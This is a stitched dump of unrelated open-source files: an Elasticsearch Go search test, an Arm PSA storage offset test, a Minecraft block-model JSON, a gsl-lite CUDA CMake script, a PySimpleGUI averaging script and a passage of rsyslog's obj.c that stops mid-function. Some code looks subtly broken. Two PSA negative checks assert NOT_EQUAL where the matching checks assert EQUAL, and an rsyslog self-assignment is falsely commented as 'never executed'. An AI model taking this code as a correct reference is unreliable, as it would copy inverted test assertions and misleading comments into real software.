// Licensed to Elasticsearch B.V under one or more agreements.
// Elasticsearch B.V. licenses this file to you under the Apache 2.0 License.
// See the LICENSE file in the project root for more information.
//
// Code generated, DO NOT EDIT
package elasticsearch_test
import (
"fmt"
"os"
"testing"
"github.com/elastic/go-elasticsearch/v8"
)
var (
_ = fmt.Printf
_ = os.Stdout
_ = elasticsearch.NewDefaultClient
)
// <https://github.com/elastic/elasticsearch/blob/master/docs/reference/search/search.asciidoc#L10>
//
// --------------------------------------------------------------------------------
// GET /my-index-000001/_search
// --------------------------------------------------------------------------------
// Test_search_search_3e8ed6ae016eb823cb00d9035b8ac459 exercises the basic
// search example from the Elasticsearch reference docs shown above.  This
// file is code-generated from the docs; lines suffixed "// SKIP" are test
// scaffolding stripped when the snippet (between the tag/end markers) is
// rendered back into documentation.
func Test_search_search_3e8ed6ae016eb823cb00d9035b8ac459(t *testing.T) {
	es, _ := elasticsearch.NewDefaultClient()
	// tag:3e8ed6ae016eb823cb00d9035b8ac459[]
	res, err := es.Search(
		es.Search.WithIndex("my-index-000001"),
		es.Search.WithPretty(),
	)
	fmt.Println(res, err)
	if err != nil { // SKIP
		t.Fatalf("Error getting the response: %s", err) // SKIP
	} // SKIP
	defer res.Body.Close() // SKIP
	// end:3e8ed6ae016eb823cb00d9035b8ac459[]
}
| {
"pile_set_name": "Github"
} |
/** @file
* Copyright (c) 2019, Arm Limited or its affiliates. All rights reserved.
* SPDX-License-Identifier : Apache-2.0
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
**/
#include "val_interfaces.h"
#include "val_target.h"
#include "test_s008.h"
#ifdef ITS_TEST
#include "test_its_data.h"
#elif PS_TEST
#include "test_ps_data.h"
#endif
#define TEST_BUFF_SIZE 20
#define TEST_MAX_UINT32 0xFFFFFFFF
client_test_t test_s008_sst_list[] = {
NULL,
psa_sst_valid_offset_success,
psa_sst_invalid_offset_failure,
NULL,
};
static psa_sst_uid_t uid = UID_BASE_VALUE + 5;
static uint8_t read_buff[TEST_BUFF_SIZE];
static uint8_t write_buff[TEST_BUFF_SIZE] = {0x99, 0x01, 0x02, 0x03, 0x04, 0x23, 0xF6, 0x07, 0x08, \
0x0D, 0x70, 0xA1, 0xFF, 0xFF, 0x14, 0x73, 0x46, 0x97, 0xE8, 0xDD};
/* Check 2 (negative tests): reads with invalid offset/length combinations
 * must fail as recorded in s008_data[], and must leave the caller's read
 * buffer untouched (all zero bytes).  Finally the UID created by
 * psa_sst_valid_offset_success() is removed.
 * 'caller' identifies the calling partition's security state (unused here,
 * kept for the common client_test_t signature).
 * Returns VAL_STATUS_SUCCESS, or fails via the TEST_ASSERT_* macros.
 */
int32_t psa_sst_invalid_offset_failure(caller_security_t caller)
{
    uint32_t status, j;

    /* Case where offset = data_size +1 , data_len 0. Also check nothing is returned in read buff*/
    val->print(PRINT_TEST, "[Check 2] Try to access data with varying invalid offset\n", 0);
    memset(read_buff, 0, TEST_BUFF_SIZE);
    status = SST_FUNCTION(s008_data[6].api, uid, TEST_BUFF_SIZE+1, 0, read_buff);
    TEST_ASSERT_NOT_EQUAL(status, s008_data[6].status, TEST_CHECKPOINT_NUM(6));
    for (j = 0; j < TEST_BUFF_SIZE; j++)
    {
        /* buffer must still be all zeroes after the failed read */
        TEST_ASSERT_EQUAL(read_buff[j], 0x00, TEST_CHECKPOINT_NUM(7));
    }

    /* Case where offset = data_size , data_len= 1 Also check nothing is returned in read buff*/
    status = SST_FUNCTION(s008_data[8].api, uid, TEST_BUFF_SIZE, 1, read_buff);
    TEST_ASSERT_EQUAL(status, s008_data[8].status, TEST_CHECKPOINT_NUM(8));
    for (j = 0; j < TEST_BUFF_SIZE; j++)
    {
        TEST_ASSERT_EQUAL(read_buff[j], 0x00, TEST_CHECKPOINT_NUM(9));
    }

    /* Case where offset = 0 , data_len > data_size Also check nothing is returned in read buff*/
    status = SST_FUNCTION(s008_data[10].api, uid, 0, TEST_BUFF_SIZE+1, read_buff);
    TEST_ASSERT_EQUAL(status, s008_data[10].status, TEST_CHECKPOINT_NUM(10));
    for (j = 0; j < TEST_BUFF_SIZE; j++)
    {
        TEST_ASSERT_EQUAL(read_buff[j], 0x00, TEST_CHECKPOINT_NUM(11));
    }

    /* Try to access data with offset as MAX_UINT32 and length less than buffer size */
    status = SST_FUNCTION(s008_data[12].api, uid, TEST_MAX_UINT32, TEST_BUFF_SIZE/2, read_buff);
    TEST_ASSERT_NOT_EQUAL(status, s008_data[12].status, TEST_CHECKPOINT_NUM(12));

    /* Remove the UID */
    status = SST_FUNCTION(s008_data[13].api, uid);
    TEST_ASSERT_EQUAL(status, s008_data[13].status, TEST_CHECKPOINT_NUM(13));

    return VAL_STATUS_SUCCESS;
}
/* Check 1 (positive tests): create a TEST_BUFF_SIZE entry for 'uid' and
 * verify partial reads succeed for valid (offset, length) pairs, first
 * with offset + length == data size, then with offset + length < data
 * size.  Each read is byte-compared against the corresponding slice of
 * write_buff.  The UID is deliberately left in place for the follow-up
 * psa_sst_invalid_offset_failure() test, which removes it.
 * 'caller' identifies the calling partition's security state (unused here).
 * Returns VAL_STATUS_SUCCESS, or fails via the TEST_ASSERT_* macros.
 */
int32_t psa_sst_valid_offset_success(caller_security_t caller)
{
    uint32_t status, data_len, offset = TEST_BUFF_SIZE;

    /* Set data for UID */
    status = SST_FUNCTION(s008_data[1].api, uid, TEST_BUFF_SIZE, write_buff, 0);
    TEST_ASSERT_EQUAL(status, s008_data[1].status, TEST_CHECKPOINT_NUM(1));

    /* Case where offset + datalen = data_size; offset halves each pass */
    val->print(PRINT_TEST, "[Check 1] Try to access data with varying valid offset\n", 0);
    while (offset > 0)
    {
        data_len = TEST_BUFF_SIZE - offset;
        memset(read_buff, 0, TEST_BUFF_SIZE);
        status = SST_FUNCTION(s008_data[2].api, uid, offset, data_len, read_buff);
        TEST_ASSERT_EQUAL(status, s008_data[2].status, TEST_CHECKPOINT_NUM(2));
        TEST_ASSERT_MEMCMP(read_buff, write_buff + offset, data_len, TEST_CHECKPOINT_NUM(3));
        offset >>= 1;
    }
    offset = TEST_BUFF_SIZE - 2;
    data_len = 1;
    /* Case where offset + datalen < data_size; offset halves while the
     * requested length doubles each pass */
    while (offset > 0)
    {
        status = SST_FUNCTION(s008_data[4].api, uid, offset, data_len, read_buff);
        TEST_ASSERT_EQUAL(status, s008_data[4].status, TEST_CHECKPOINT_NUM(4));
        TEST_ASSERT_MEMCMP(read_buff, write_buff + offset, data_len, TEST_CHECKPOINT_NUM(5));
        offset >>= 1;
        data_len <<= 1;
    }

    return VAL_STATUS_SUCCESS;
}
| {
"pile_set_name": "Github"
} |
{
"parent": "block/cube_column",
"textures": {
"end": "biomesoplenty:block/stripped_hellbark_log_top",
"side": "biomesoplenty:block/stripped_hellbark_log"
}
}
| {
"pile_set_name": "Github"
} |
# Copyright 2015-2018 by Martin Moene
#
# gsl-lite is based on GSL: Guidelines Support Library,
# https://github.com/microsoft/gsl
#
# This code is licensed under the MIT License (MIT).
cmake_minimum_required( VERSION 3.17 FATAL_ERROR )
project( gsl-lite-test-cuda LANGUAGES CXX CUDA )
set( unit_name "gsl" )
set( PACKAGE ${unit_name}-lite )
set( PROGRAM ${unit_name}-lite )
message( STATUS "Subproject '${PROJECT_NAME}', programs '${PROGRAM}-*'")
# Test sources:
set( CUDA_SOURCES
cuda.t.cu
)
set( SOURCES
../gsl-lite.t.cpp
../assert.t.cpp
../at.t.cpp
../byte.t.cpp
../emulation.t.cpp
../issue.t.cpp
../not_null.t.cpp
../owner.t.cpp
../span.t.cpp
../string_span.t.cpp
../util.t.cpp
)
set_property( SOURCE ${SOURCES} PROPERTY LANGUAGE CUDA ) # compile .cpp files with the CUDA compiler
# Configure gsl-lite for testing:
set( GSL_CONFIG
-Dgsl_TESTING_
-Dgsl_CONFIG_CONTRACT_VIOLATION_THROWS
-Dgsl_CONFIG_CONTRACT_CHECKING_AUDIT
)
# Set NVCC-specific options:
set( NVCC_OPTIONS --Werror all-warnings -G )
# Determine compiler-specifics for MSVC, GNUC, Clang:
if( MSVC )
message( STATUS "Matched: MSVC")
set( OPTIONS /EHsc /WX /W4 )
set( DEFINITIONS -D_SCL_SECURE_NO_WARNINGS )
elseif( CMAKE_CXX_COMPILER_ID MATCHES "GNU|Clang|AppleClang" )
message( STATUS "CompilerId: '${CMAKE_CXX_COMPILER_ID}'")
set( OPTIONS ${OPTIONS}
-Werror
-Wall
-Wno-missing-braces
-Wconversion
-Wsign-conversion
-fno-elide-constructors
-fstrict-aliasing -Wstrict-aliasing=2
)
set( DEFINITIONS "" )
else()
# as is
message( STATUS "Matched: nothing")
endif()
# Have NVCC forward the host compiler options with "-Xcompiler=<opt>":
list( TRANSFORM OPTIONS PREPEND -Xcompiler= )
# Add targets and configure unit tests via CTest:
enable_testing()
# make_cuda_test_target(target sources extraOptions langVersion)
#
# Define CUDA test executable <target> from <sources>, link it against the
# gsl-lite interface target, apply the project-wide NVCC/host options and
# definitions plus any <extraOptions>, set the CUDA standard to
# <langVersion> (14 or 17), precompile the shared test header, and
# register the executable with CTest.
function( make_cuda_test_target target sources extraOptions langVersion )
    message( STATUS "Make CUDA target: '${target}'" )
    add_executable ( ${target} ${sources} )
    target_link_libraries ( ${target} PRIVATE ${PACKAGE}-v1 )
    target_compile_options ( ${target} PRIVATE ${NVCC_OPTIONS} ${OPTIONS} ${extraOptions} )
    target_compile_definitions( ${target} PRIVATE ${DEFINITIONS} ${GSL_CONFIG} )
    #target_compile_features ( ${target} PRIVATE cxx_std_${langVersion} cuda_std_${langVersion} ) # apparently not supported yet
    set_target_properties ( ${target} PROPERTIES CUDA_STANDARD ${langVersion} )
    target_precompile_headers ( ${target} PRIVATE ../gsl-lite.t.hpp )
    add_test( NAME ${target} COMMAND ${target} )
endfunction()
make_cuda_test_target( ${PROGRAM}-cuda14.t "${SOURCES};${CUDA_SOURCES}" "" 14 )
make_cuda_test_target( ${PROGRAM}-cuda14-expt.t "${SOURCES};${CUDA_SOURCES}" "--expt-relaxed-constexpr" 14 )
if( CMAKE_CUDA_COMPILER_ID MATCHES "NVIDIA" AND CMAKE_CUDA_COMPILER_VERSION VERSION_GREATER_EQUAL 11.0 )
make_cuda_test_target( ${PROGRAM}-cuda17.t "${SOURCES};${CUDA_SOURCES}" "" 17 )
make_cuda_test_target( ${PROGRAM}-cuda17-expt.t "${SOURCES};${CUDA_SOURCES}" "--expt-relaxed-constexpr" 17 )
endif()
# end of file
| {
"pile_set_name": "Github"
} |
#PySimple examples (v 3.9)
#Tony Crewe
#Oct 2018 MacOs
import PySimpleGUI as sg
import os #to work with windows OS
#sg.ChangeLookAndFeel('GreenTan')
sg.SetOptions(background_color = 'LightBlue',
element_background_color = 'LightBlue',
text_element_background_color = 'LightBlue',
font= ('Calibri', 14, 'bold'))
layout = [
[sg.Text('Enter a Name and four Marks')],
[sg.Text('Name:', size =(8,1)), sg.InputText(size = (10,1), key = '_name_')],
[sg.Text('Mark1:', size =(8,1)), sg.InputText(size = (5,1), key = '_m1_')],
[sg.Text('Mark2:', size =(8,1)), sg.InputText(size = (5,1), key = '_m2_')],
[sg.Text('Mark3:', size =(8,1)), sg.InputText(size = (5,1), key = '_m3_')],
[sg.Text('Mark4:', size =(8,1)), sg.InputText(size = (5,1), key = '_m4_')],
[sg.ReadButton('Save', size = (6,1),key = '_save_'), sg.Text('Press to Save to file')],
[sg.ReadButton('Display',size = (6,1), key = '_display_'), sg.Text('To retrieve and Display')],
[sg.Multiline(size = (24,4), key = '_multiline_', pad = (2,15))]]
window = sg.Window('Simple Average Finder').Layout(layout)
while True:
    # Read blocks until the user presses a button or closes the window.
    # 'button' is the key of the element pressed (None on window close);
    # 'value' maps element keys to their current contents.
    button, value = window.Read()
    if button is None:
        break

    # Results live next to this script in 'results.txt'.
    dirname, filename = os.path.split(os.path.abspath(__file__))
    pathname = os.path.join(dirname, 'results.txt')

    if button == '_save_':
        name = value['_name_']
        try:
            # Collect and convert all four marks up front so that a bad
            # entry aborts the save before anything touches the file.
            marks = [float(value['_m%d_' % i]) for i in range(1, 5)]
        except ValueError:
            # Blank or non-numeric entry.
            sg.Popup('Error', 'Check entries and try again')
            continue
        if any(mark < 0 or mark > 100 for mark in marks):
            # BUG FIX: previously an out-of-range mark was merely skipped,
            # and a partial total/average was still written to the file.
            sg.Popup('Out of Range', 'Enter Marks between 0 and 100')
            continue
        total = sum(marks)
        average = total / 4
        # 'with' guarantees the file is closed even if a write fails
        # (the original left the handle open on an exception).
        with open(pathname, 'w') as f:
            print(name, file=f)
            print(total, file=f)
            print(average, file=f)
    elif button == '_display_':
        try:
            # Load the saved file line by line, stripping whitespace.
            data = [line.strip() for line in open(pathname)]
            # Build a single string for the multiline display element.
            string = ('Name: ' + data[0] + '\nTotal: ' + str(data[1])
                      + '\nAverage: ' + str(data[2]))
            window.FindElement('_multiline_').Update(string)
        except:
            sg.PopupError('Error', 'Problem finding or reading file')
| {
"pile_set_name": "Github"
} |
/* obj.c
*
* This file implements a generic object "class". All other classes can
* use the service of this base class here to include auto-destruction and
* other capabilities in a generic manner.
*
* As of 2008-02-29, I (rgerhards) am adding support for dynamically loadable
* objects. In essence, each object will soon be available via its interface,
* only. Before any object's code is accessed (including global static methods),
* the caller needs to obtain an object interface. To do so, it needs to provide
* the object name and the file where the object is expected to reside in. A
* file may not be given, in which case the object is expected to reside in
* the rsyslog core. The caller than receives an interface pointer which can
* be utilized to access all the object's methods. This method enables rsyslog
* to load library modules on demand. In order to keep overhead low, callers
* should request object interface only once in the object Init function and
* free them when they exit. The only exception is when a caller needs to
* access an object only conditional, in which case a pointer to its interface
* shall be aquired as need first arises but still be released only on exit
* or when there definitely is no further need. The whole idea is to limit
* the very performance-intense act of dynamically loading an objects library.
* Of course, it is possible to violate this suggestion, but than you should
* have very good reasoning to do so.
*
* Please note that there is one trick we need to do. Each object queries
* the object interfaces and it does so via objUse(). objUse, however, is
* part of the obj object's interface (implemented via the file you are
* just reading). So in order to obtain a pointer to objUse, we need to
* call it - obviously not possible. One solution would be that objUse is
* hardcoded into all callers. That, however, would bring us into slight
* trouble with actually dynamically loaded modules, as we should NOT
* rely on the OS loader to resolve symbols back to the caller (this
* is a feature not universally available and highly importable). Of course,
* we can solve this with a pHostQueryEtryPoint() call. It still sounds
* somewhat unnatural to call a regular interface function via a special
* method. So what we do instead is define a special function called
* objGetObjInterface() which delivers our own interface. That function
* than will be defined global and be queriable via pHostQueryEtryPoint().
* I agree, technically this is much the same, but from an architecture
* point of view it looks cleaner (at least to me).
*
* Please note that there is another egg-hen problem: we use a linked list,
* which is provided by the linkedList object. However, we need to
* initialize the linked list before we can provide the UseObj()
* functionality. That, in turn, would probably be required by the
* linkedList object. So the solution is to use a backdoor just to
* init the linked list and from then on use the usual interfaces.
*
* File begun on 2008-01-04 by RGerhards
*
* Copyright 2008-2016 Rainer Gerhards and Adiscon GmbH.
*
* This file is part of the rsyslog runtime library.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
* -or-
* see COPYING.ASL20 in the source distribution
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include "config.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <assert.h>
#include <pthread.h>
/* how many objects are supported by rsyslogd? */
#define OBJ_NUM_IDS 100 /* TODO change to a linked list? info: 16 were currently in use 2008-02-29 */
#include "rsyslog.h"
#include "syslogd-types.h"
#include "srUtils.h"
#include "obj.h"
#include "stream.h"
#include "modules.h"
#include "errmsg.h"
#include "cfsysline.h"
#include "unicode-helper.h"
#include "datetime.h"
/* static data */
DEFobjCurrIf(obj) /* we define our own interface, as this is expected by some macros! */
DEFobjCurrIf(var)
DEFobjCurrIf(module)
DEFobjCurrIf(strm)
static objInfo_t *arrObjInfo[OBJ_NUM_IDS]; /* array with object information pointers */
pthread_mutex_t mutObjGlobalOp; /* mutex to guard global operations of the object system */
/* cookies for serialized lines */
#define COOKIE_OBJLINE '<'
#define COOKIE_PROPLINE '+'
#define COOKIE_ENDLINE '>'
#define COOKIE_BLANKLINE '.'
/* forward definitions */
static rsRetVal FindObjInfo(const char *szObjName, objInfo_t **ppInfo);
/* methods */
/* This is a dummy method to be used when a standard method has not been
 * implemented by an object. Having it allows us to simply call via the
 * jump table without any NULL pointer checks - which gains quite
 * some performance. -- rgerhards, 2008-01-04
 * Always returns RS_RET_NOT_IMPLEMENTED; InfoConstruct() installs it as
 * the default handler for every optional method slot.
 */
static rsRetVal objInfoNotImplementedDummy(void __attribute__((unused)) *pThis)
{
	return RS_RET_NOT_IMPLEMENTED;
}
/* and now the macro to check if something is not implemented
* must be provided an objInfo_t pointer.
*/
#define objInfoIsImplemented(pThis, method) \
(pThis->objMethods[method] != objInfoNotImplementedDummy)
/* construct an object Info object. Each class shall do this on init. The
 * resulting object shall be cached during the lifetime of the class and each
 * object shall receive a reference. A constructor and destructor MUST be provided for all
 * objects, thus they are in the parameter list.
 * pszID is the identifying object name and must point to constant pool memory. It is never freed.
 * ppThis    [out] receives the newly allocated objInfo_t
 * iObjVers  object (serialization) version number
 * pQueryIF  interface-query entry point of the class (may be used via objUse)
 * pModInfo  owning loadable module, or NULL for core objects
 * Returns RS_RET_OK or RS_RET_OUT_OF_MEMORY.
 */
static rsRetVal
InfoConstruct(objInfo_t **ppThis, uchar *pszID, int iObjVers,
	      rsRetVal (*pConstruct)(void *), rsRetVal (*pDestruct)(void *),
	      rsRetVal (*pQueryIF)(interface_t*), modInfo_t *pModInfo)
{
	DEFiRet;
	int i;
	objInfo_t *pThis;
	assert(ppThis != NULL);
	if((pThis = calloc(1, sizeof(objInfo_t))) == NULL)
		ABORT_FINALIZE(RS_RET_OUT_OF_MEMORY);
	pThis->pszID = pThis->pszID; /* <- never executed; see assignment below */
	pThis->pszID = pszID;
	pThis->lenID = ustrlen(pszID);
	pThis->pszName = ustrdup(pszID); /* it's OK if we have NULL ptr, GetName() will deal with that! */
	pThis->iObjVers = iObjVers;
	pThis->QueryIF = pQueryIF;
	pThis->pModInfo = pModInfo;
	pThis->objMethods[0] = pConstruct;  /* slot 0: constructor */
	pThis->objMethods[1] = pDestruct;   /* slot 1: destructor */
	/* all remaining slots default to the not-implemented dummy */
	for(i = 2 ; i < OBJ_NUM_METHODS ; ++i) {
		pThis->objMethods[i] = objInfoNotImplementedDummy;
	}
	*ppThis = pThis;
finalize_it:
	RETiRet;
}
/* destruct the objInfo object - must be done only when no more instances exist.
 * rgerhards, 2008-03-10
 * Frees the duplicated name (pszID itself is constant-pool memory and is
 * deliberately NOT freed) and NULLs the caller's pointer.
 */
static rsRetVal
InfoDestruct(objInfo_t **ppThis)
{
	DEFiRet;
	objInfo_t *pThis;
	assert(ppThis != NULL);
	pThis = *ppThis;
	assert(pThis != NULL);
	free(pThis->pszName);
	free(pThis);
	*ppThis = NULL;
	RETiRet;
}
/* set a method handler: install pHandler in the jump-table slot selected
 * by objMethod, replacing the not-implemented dummy (or a prior handler).
 */
static rsRetVal
InfoSetMethod(objInfo_t *pThis, objMethod_t objMethod, rsRetVal (*pHandler)(void*))
{
	pThis->objMethods[objMethod] = pHandler;
	return RS_RET_OK;
}
/* destruct the base object properties.
 * rgerhards, 2008-01-29
 * Frees only the per-instance name; called by the derived classes'
 * destructors to release what objConstruct-level code allocated.
 */
static rsRetVal
DestructObjSelf(obj_t *pThis)
{
	DEFiRet;
	ISOBJ_assert(pThis);
	free(pThis->pszName);
	RETiRet;
}
/* --------------- object serializiation / deserialization support --------------- */
/* serialize the header of an object
 * pszRecType must be either "Obj" (Object) or "OPB" (Object Property Bag)
 * Emits: '<' <rectype> ":1:" <objID> ":" <objVersion> ":\n"
 * where '1' is the (so far only) serializer format version.
 */
static rsRetVal objSerializeHeader(strm_t *pStrm, obj_t *pObj, uchar *pszRecType)
{
	DEFiRet;
	ISOBJ_TYPE_assert(pStrm, strm);
	ISOBJ_assert(pObj);
	assert(!strcmp((char*) pszRecType, "Obj") || !strcmp((char*) pszRecType, "OPB"));
	/* object cookie and serializer version (so far always 1) */
	CHKiRet(strm.WriteChar(pStrm, COOKIE_OBJLINE));
	CHKiRet(strm.Write(pStrm, (uchar*) pszRecType, 3)); /* record types are always 3 octets */
	CHKiRet(strm.WriteChar(pStrm, ':'));
	CHKiRet(strm.WriteChar(pStrm, '1'));
	/* object type, version and string length */
	CHKiRet(strm.WriteChar(pStrm, ':'));
	CHKiRet(strm.Write(pStrm, pObj->pObjInfo->pszID, pObj->pObjInfo->lenID));
	CHKiRet(strm.WriteChar(pStrm, ':'));
	CHKiRet(strm.WriteLong(pStrm, objGetVersion(pObj)));
	/* record trailer */
	CHKiRet(strm.WriteChar(pStrm, ':'));
	CHKiRet(strm.WriteChar(pStrm, '\n'));
finalize_it:
	RETiRet;
}
/* begin serialization of an object
 * rgerhards, 2008-01-06
 * Opens a stream record and writes the "Obj" header; must later be
 * paired with EndSerialize().
 */
static rsRetVal
BeginSerialize(strm_t *pStrm, obj_t *pObj)
{
	DEFiRet;
	ISOBJ_TYPE_assert(pStrm, strm);
	ISOBJ_assert(pObj);
	CHKiRet(strm.RecordBegin(pStrm));
	CHKiRet(objSerializeHeader(pStrm, pObj, (uchar*) "Obj"));
finalize_it:
	RETiRet;
}
/* begin serialization of an object's property bag
 * Note: a property bag is used to serialize some of an objects
 * properties, but not necessarily all. A good example is the queue
 * object, which at some stage needs to serialize a number of its
 * properties, but not the queue data itself. From the object point
 * of view, a property bag can not be used to re-instantiate an object.
 * Otherwise, the serialization is exactly the same.
 * rgerhards, 2008-01-11
 * Identical to BeginSerialize() except for the "OPB" record type.
 */
static rsRetVal
BeginSerializePropBag(strm_t *pStrm, obj_t *pObj)
{
	DEFiRet;
	ISOBJ_TYPE_assert(pStrm, strm);
	ISOBJ_assert(pObj);
	CHKiRet(strm.RecordBegin(pStrm));
	CHKiRet(objSerializeHeader(pStrm, pObj, (uchar*) "OPB"));
finalize_it:
	RETiRet;
}
/* append a property
 * Converts the value at pUsr (interpreted per propType) to its textual
 * form and writes one property line:
 *   '+' <name> ':' <varType> ':' <length> ':' <data> ":\n"
 * A NULL pUsr is silently skipped (returns RS_RET_OK without output).
 */
static rsRetVal
SerializeProp(strm_t *pStrm, uchar *pszPropName, propType_t propType, void *pUsr)
{
	DEFiRet;
	uchar *pszBuf = NULL;
	size_t lenBuf = 0;
	uchar szBuf[64];	/* scratch for numeric / time conversions */
	varType_t vType = VARTYPE_NONE;
	ISOBJ_TYPE_assert(pStrm, strm);
	assert(pszPropName != NULL);
	/*dbgprintf("objSerializeProp: strm %p, propName '%s', type %d, pUsr %p\n",
		pStrm, pszPropName, propType, pUsr);*/
	/* if we have no user pointer, there is no need to write this property.
	 * TODO: think if that's the right point of view
	 * rgerhards, 2008-01-06
	 */
	if(pUsr == NULL) {
		ABORT_FINALIZE(RS_RET_OK);
	}
	/* TODO: use the stream functions for data conversion here - should be quicker */
	switch(propType) {
		case PROPTYPE_PSZ:
			pszBuf = (uchar*) pUsr;
			lenBuf = ustrlen(pszBuf);
			vType = VARTYPE_STR;
			break;
		case PROPTYPE_SHORT:
			CHKiRet(srUtilItoA((char*) szBuf, sizeof(szBuf), (long) *((short*) pUsr)));
			pszBuf = szBuf;
			lenBuf = ustrlen(szBuf);
			vType = VARTYPE_NUMBER;
			break;
		case PROPTYPE_INT:
			CHKiRet(srUtilItoA((char*) szBuf, sizeof(szBuf), (long) *((int*) pUsr)));
			pszBuf = szBuf;
			lenBuf = ustrlen(szBuf);
			vType = VARTYPE_NUMBER;
			break;
		case PROPTYPE_LONG:
			CHKiRet(srUtilItoA((char*) szBuf, sizeof(szBuf), *((long*) pUsr)));
			pszBuf = szBuf;
			lenBuf = ustrlen(szBuf);
			vType = VARTYPE_NUMBER;
			break;
		case PROPTYPE_INT64:
			CHKiRet(srUtilItoA((char*) szBuf, sizeof(szBuf), *((int64*) pUsr)));
			pszBuf = szBuf;
			lenBuf = ustrlen(szBuf);
			vType = VARTYPE_NUMBER;
			break;
		case PROPTYPE_CSTR:
			pszBuf = rsCStrGetSzStrNoNULL((cstr_t *) pUsr);
			lenBuf = rsCStrLen((cstr_t*) pUsr);
			vType = VARTYPE_STR;
			break;
		case PROPTYPE_SYSLOGTIME:
			/* all syslogTime_t fields, colon-separated; format mirrors
			 * objDeserializeSyslogTime() */
			lenBuf = snprintf((char*) szBuf, sizeof(szBuf), "%d:%d:%d:%d:%d:%d:%d:%d:%d:%c:%d:%d",
					  ((syslogTime_t*)pUsr)->timeType,
					  ((syslogTime_t*)pUsr)->year,
					  ((syslogTime_t*)pUsr)->month,
					  ((syslogTime_t*)pUsr)->day,
					  ((syslogTime_t*)pUsr)->hour,
					  ((syslogTime_t*)pUsr)->minute,
					  ((syslogTime_t*)pUsr)->second,
					  ((syslogTime_t*)pUsr)->secfrac,
					  ((syslogTime_t*)pUsr)->secfracPrecision,
					  ((syslogTime_t*)pUsr)->OffsetMode,
					  ((syslogTime_t*)pUsr)->OffsetHour,
					  ((syslogTime_t*)pUsr)->OffsetMinute);
			if(lenBuf > sizeof(szBuf) - 1)
				ABORT_FINALIZE(RS_RET_PROVIDED_BUFFER_TOO_SMALL);
			vType = VARTYPE_SYSLOGTIME;
			pszBuf = szBuf;
			break;
		case PROPTYPE_NONE:
		default:
			dbgprintf("invalid PROPTYPE %d\n", propType);
			break;
	}
	/* cookie */
	CHKiRet(strm.WriteChar(pStrm, COOKIE_PROPLINE));
	/* name */
	CHKiRet(strm.Write(pStrm, pszPropName, ustrlen(pszPropName)));
	CHKiRet(strm.WriteChar(pStrm, ':'));
	/* type */
	CHKiRet(strm.WriteLong(pStrm, (int) vType));
	CHKiRet(strm.WriteChar(pStrm, ':'));
	/* length */
	CHKiRet(strm.WriteLong(pStrm, lenBuf));
	CHKiRet(strm.WriteChar(pStrm, ':'));
	/* data */
	CHKiRet(strm.Write(pStrm, (uchar*) pszBuf, lenBuf));
	/* trailer */
	CHKiRet(strm.WriteChar(pStrm, ':'));
	CHKiRet(strm.WriteChar(pStrm, '\n'));
finalize_it:
	RETiRet;
}
/* end serialization of an object: write the end-of-record marker
 * ('>' "End") followed by a blank line ('.'), then close the stream
 * record.  Must be paired with a prior BeginSerialize[PropBag]().
 * Returns RS_RET_OK on success, a stream error code otherwise.
 */
static rsRetVal
EndSerialize(strm_t *pStrm)
{
	DEFiRet;
	assert(pStrm != NULL);
	CHKiRet(strm.WriteChar(pStrm, COOKIE_ENDLINE));
	/* FIX: use the same literal for the data and the length computation.
	 * The original wrote "End\n" but sized it with sizeof("END\n"); the
	 * lengths happened to agree, yet a future edit to either literal
	 * would have silently corrupted the record format.
	 */
	CHKiRet(strm.Write(pStrm, (uchar*) "End\n", sizeof("End\n") - 1));
	CHKiRet(strm.WriteChar(pStrm, COOKIE_BLANKLINE));
	CHKiRet(strm.WriteChar(pStrm, '\n'));
	CHKiRet(strm.RecordEnd(pStrm));
finalize_it:
	RETiRet;
}
/* define a helper to make code below a bit cleaner (and quicker to write) */
#define NEXTC CHKiRet(strm.ReadChar(pStrm, &c))/*;dbgprintf("c: %c\n", c)*/
/* de-serialize an embedded, non-octet-counted string. This is useful
 * for deserializing the object name inside the header. The string is
 * terminated by the first occurrence of the ':' character.
 * rgerhards, 2008-02-29
 * On success *ppStr receives a new cstr_t (ownership passes to caller);
 * on failure any partial string is destroyed.
 */
static rsRetVal
objDeserializeEmbedStr(cstr_t **ppStr, strm_t *pStrm)
{
	DEFiRet;
	uchar c;
	cstr_t *pStr = NULL;
	assert(ppStr != NULL);
	CHKiRet(cstrConstruct(&pStr));
	NEXTC;
	while(c != ':') {
		CHKiRet(cstrAppendChar(pStr, c));
		NEXTC;
	}
	cstrFinalize(pStr);
	*ppStr = pStr;
finalize_it:
	if(iRet != RS_RET_OK && pStr != NULL)
		cstrDestruct(&pStr);
	RETiRet;
}
/* de-serialize a number: reads an optionally '-'-prefixed decimal
 * integer terminated by ':' and stores it in *pNum.  Fails with
 * RS_RET_INVALID_NUMBER when no digit follows, or
 * RS_RET_INVALID_DELIMITER when the terminator is missing.
 */
static rsRetVal objDeserializeNumber(number_t *pNum, strm_t *pStrm)
{
	DEFiRet;
	number_t i;
	int bIsNegative;
	uchar c;
	assert(pNum != NULL);
	NEXTC;
	if(c == '-') {
		bIsNegative = 1;
		NEXTC;
	} else {
		bIsNegative = 0;
	}
	/* we check this so that we get more meaningful error codes */
	if(!isdigit(c)) ABORT_FINALIZE(RS_RET_INVALID_NUMBER);
	i = 0;
	while(isdigit(c)) {
		i = i * 10 + c - '0';
		NEXTC;
	}
	if(c != ':') ABORT_FINALIZE(RS_RET_INVALID_DELIMITER);
	if(bIsNegative)
		i *= -1;
	*pNum = i;
finalize_it:
	RETiRet;
}
/* de-serialize a string, length must be provided but may be 0
 * Reads exactly iLen octets followed by the ':' terminator into a new
 * cstr_t; ownership passes to the caller on success, and any partial
 * string is destroyed on failure.
 */
static rsRetVal objDeserializeStr(cstr_t **ppCStr, int iLen, strm_t *pStrm)
{
	DEFiRet;
	int i;
	uchar c;
	cstr_t *pCStr = NULL;
	assert(ppCStr != NULL);
